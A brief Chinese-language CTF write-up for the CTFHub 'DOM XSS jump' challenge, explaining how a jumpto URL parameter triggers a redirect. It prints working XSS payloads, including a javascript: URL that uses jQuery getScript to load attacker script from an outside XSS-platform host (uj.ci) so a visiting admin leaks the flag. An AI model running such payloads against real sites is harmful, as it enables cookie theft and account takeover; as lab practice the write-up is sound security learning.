9.1 CTFHUB DOM XSS 跳转

这题没有明显可见的可传的GET参数
观察源码：

这个是对于url中的GET参数 如果 参数名字为 jumpto的话就进行跳转
所以我们可以利用 ?jumpto= 来进行 xss注入
由于这题是跳转型 不能直接用

</tEXtArEa>'"><sCRiPt sRC=//uj.ci/idp></sCrIpT>

这些XSS注入语句
但是利用这个跳转 我们可以利用这个语句：

用 jQuery的异步函数

?jumpto=javascript:$.getScript("uj.ci/idp")

来执行xss平台的js脚本
然后提交后 后台访问就可以得到flag了